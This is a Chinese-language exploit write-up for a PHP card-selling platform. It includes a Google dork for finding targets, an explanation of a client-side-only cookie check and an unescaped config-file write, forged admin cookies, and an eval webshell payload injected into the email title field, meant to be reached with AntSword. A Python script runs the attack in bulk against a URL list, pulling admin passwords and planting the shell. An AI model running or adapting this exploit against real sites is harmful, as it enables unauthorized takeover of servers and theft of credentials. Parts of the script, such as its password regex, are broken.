漏洞搜索
1 | inurl:admin/set.php |
漏洞原因
- admin后台文件仅在前端用 JavaScript 校验 cookie（见下文 set.php 中的 $.cookie 判断），服务端未做登录校验，可直接查看密码
- 后台发件邮箱设置把 POST 参数未经转义直接拼入 PHP 源码并写入 emailConfig.php（见下文），形成任意文件写入漏洞
漏洞代码
/admin/set.php
验证漏洞代码
1 | if($.cookie("user") == null || $.cookie("user") == "" || $.cookie("loginInfo") != $.md5($.cookie("pass"))){ |
2 | window.location.href='./login.php'; |
3 | }else{ |
4 | |
5 | } |
任意文件写入代码
1 | elseif($_GET['mod']=="sfEmail"){ |
2 | if($_POST['host'] == "" || $_POST['port'] == "" || $_POST['user'] == "" || $_POST['from'] == ""){ |
3 | showmsg("重要信息不能为空!"); |
4 | exit(); |
5 | } |
6 | $text="<?php |
7 | \$emailConfig = array( |
8 | 'host'=>'".$_POST['host']."',//邮箱的服务器地址 |
9 | 'fromName'=>'".$_POST['fromName']."',//设置发件人姓名(昵称) 任意内容 |
10 | 'port'=>'".$_POST['port']."',//端口 |
11 | 'user'=>'".$_POST['user']."',//邮箱账号 |
12 | 'pwd'=>'".$_POST['pwd']."',//邮箱密码 |
13 | 'from'=>'".$_POST['from']."',//设置发件人邮箱地址 这里填入上述提到的“发件人邮箱” |
14 | 'title'=>'".$_POST['title']."'//添加该邮件的主题 |
15 | ); |
16 | ?> |
17 | "; |
18 | saveFile("../emailConfig.php",$text); |
19 | showmsg("ok!",1); |
20 | } |
漏洞利用
添加cookies:
COOKIES = {
"user": "admin",
"pass": "admin",
"loginInfo": "21232f297a57a5a743894a0e4a801fc3"
}
访问
http://domain/admin/set.php?mod=admin
看到管理员密码进入 系统设置->发件邮箱设置->邮件标题
a');$x=&$y; $y=$_POST['cmd']; function a() { global $x; return $x; } eval(a());?>/*
之后蚁剑连接
http://domain/emailConfig.php
密码cmd
漏洞EXP【py】
1 | # encode=utf-8 |
2 | |
3 | |
4 | # search inurl:admin.php |
5 | import requests |
6 | import re |
7 | import pyfiglet |
8 | |
9 | |
10 | COOKIES = { |
11 | "user": "admin", |
12 | "pass": "admin", |
13 | "loginInfo": "21232f297a57a5a743894a0e4a801fc3" |
14 | } |
15 | |
16 | |
def geturls():
    """Read the target list from ``url.list`` in the current working directory.

    Returns one string per line exactly as read (newline terminators are
    kept); it is up to the caller to strip them.
    """
    with open("url.list") as fh:
        lines = list(fh)
    return lines
21 | |
22 | |
23 | def check(url): |
24 | # url = "http://debug.com" |
25 | purl = url.strip() + "/admin/set.php?mod=admin" |
26 | res = requests.post(purl, cookies=COOKIES) |
27 | if res.status_code == 200: |
28 | print("[+]Getting password") |
29 | print(res.text) |
30 | # getpass(res.text) |
31 | else: |
32 | exit("Got password failed") |
33 | |
34 | |
35 | def getpass(text): |
36 | user = re.search(r'', text) |
37 | pwd = re.search(r'管理员密码{30,50}', text) |
38 | if user is not None and pwd is not None: |
39 | print(user + " : " + pwd) |
40 | else: |
41 | exit("[-]Cant't find pass!") |
42 | |
43 | |
44 | def banner(): |
45 | pyfiglet.print_figlet("f a k a p a s s", colors="GREEN") |
46 | |
47 | |
48 | def write_shell(url): |
49 | purl = url + "/admin/set.php?mod=sfEmail" |
50 | data = { |
51 | "host": "smtp.163.com", |
52 | "fromName": "个人发卡平台", |
53 | "port": "25", |
54 | "user": "706672193", |
55 | "pwd": "706672193", |
56 | "from": "706672193@qq.com", |
57 | "title": "a');$x=&$y; $y=$_POST['cmd']; function a() { global $x; return $x; } eval(a());?>/*", |
58 | "submit": "修改" |
59 | } |
60 | res = requests.post(purl, data=data, cookies=COOKIES) |
61 | if res.status_code == 200: |
62 | print("[+]Write shell successfully!") |
63 | else: |
64 | print("[-]Write shell failed!") |
65 | exit("exited") |
66 | res = requests.get(url+"/emailConfig.php") |
67 | if res.status_code == 200: |
68 | print("[+]Shell path : "+url+"/emailConfig.php") |
69 | print("[+]Shell password : cmd") |
70 | else: |
71 | print("[-]Shell path is changed !") |
72 | |
73 | |
74 | def mainf(isw=0): |
75 | banner() |
76 | urls = geturls() |
77 | for url in urls: |
78 | if url[0] == "#": |
79 | continue |
80 | if "http://" != url[0:7] and "https://" != url[0:8]: |
81 | url = "http://" + url |
82 | print("URL:" + url) |
83 | check(url) |
84 | if isw != 0: |
85 | write_shell(url) |
86 | |
87 | |
88 | if __name__ == "__main__": |
89 | mainf(1) |
url写在另一个同目录文件url.list中
注
有的漏洞已经修复